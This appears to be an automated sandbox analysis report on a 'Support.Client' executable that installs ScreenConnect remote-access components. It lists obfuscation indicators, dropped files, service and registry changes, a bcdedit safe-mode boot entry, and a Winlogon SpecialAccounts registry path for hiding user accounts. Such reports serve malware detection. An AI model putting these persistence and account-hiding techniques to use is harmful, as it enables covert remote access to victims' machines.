Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA5C6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA93C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1969141037.000000001AC22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA5BE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1965505109.0000000004BA2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr

PE file contains a valid data directory to section mapping

Source: Support.Client (1).exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Support.Client (1).exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Support.Client (1).exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Support.Client (1).exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Support.Client (1).exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Binary contains a suspicious time stamp

Source: ScreenConnect.WindowsBackstageShell.exe.1.dr

Static PE information: 0x802B6300 [Sun Feb 21 01:04:00 2038 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Support.Client (1).exe

0_2_00611000

PE file contains an invalid checksum

Source: Support.Client (1).exe

Static PE information: real checksum: 0x1cb11 should be: 0x14b19

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Support.Client (1).exe	Code function: 0_2_00611BC0 push ecx; ret	0_2_00611BD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B77D2A5 pushad ; iretd	1_2_00007FFD9B77D2A6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B896110 pushfd ; ret	1_2_00007FFD9B8D62E1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B897D00 push eax; retf	1_2_00007FFD9B897D1D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8BD7B5 push eax; retf	1_2_00007FFD9B8BD7FD
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 10_2_00CA7318 push eax; retf	10_2_00CA7319
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 10_2_00CA7768 push esp; iretd	10_2_00CA7769
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 11_2_04FDB0C0 push eax; mov dword ptr [esp], ecx	11_2_04FDB0C1
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 11_2_04FD82B0 push eax; mov dword ptr [esp], ecx	11_2_04FD82B1
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 11_2_058381E1 pushad ; ret	11_2_058381F3
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 11_2_0583AFAF push es; iretd	11_2_0583B020
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 11_2_0583E9E0 push es; ret	11_2_0583E9F0
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 11_2_063930E0 push es; ret	11_2_063930F0
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9B8B22F4 push ebx; retf	12_2_00007FFD9B8B22FA
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9B8B096D push ebx; retf	12_2_00007FFD9B8B098A
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9B8B08CD push ebx; retf	12_2_00007FFD9B8B098A
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBB827A push ebp; ret	12_2_00007FFD9BBB82EA
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBB82BE push ebp; ret	12_2_00007FFD9BBB82EA
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBB527A pushad ; ret	12_2_00007FFD9BBB5289
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBB80BD push ebx; ret	12_2_00007FFD9BBB810A
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBB8040 push edx; ret	12_2_00007FFD9BBB804A
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBB37B4 pushad ; iretd	12_2_00007FFD9BBB37B5
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBB7F78 push eax; ret	12_2_00007FFD9BBB7F8A
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBB85C9 push edi; ret	12_2_00007FFD9BBB85EA
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBB8521 push edi; ret	12_2_00007FFD9BBB854A
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9B8822F4 push ebx; retf	13_2_00007FFD9B8822FA
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9B88096D push ebx; retf	13_2_00007FFD9B88098A
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9B8808CD push ebx; retf	13_2_00007FFD9B88098A
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BB93A75 push es; ret	13_2_00007FFD9BB93A8A
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BB90A40 push edx; retn FD9Bh	13_2_00007FFD9BB90A9A

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Windows.dll	Jump to dropped file

May use bcdedit to modify the Windows boot settings

Source: ScreenConnect.ClientService.dll.1.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
Source: ScreenConnect.ClientService.dll0.1.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}

Boot Survival

Creates or modifies windows services

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application

Modifies existing windows services

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (9298e168-a0cf-488d-954c-5c180dd52fec)

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1970874723.000000001B382000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.exe, 0000000A.00000002.1964904013.0000000000D02000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.2932709226.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024038339.0000000000BC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024331738.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.ClientService.dll.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll0.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.dll0.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Stores large binary data to the registry

Source: C:\Users\user\Desktop\Support.Client (1).exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
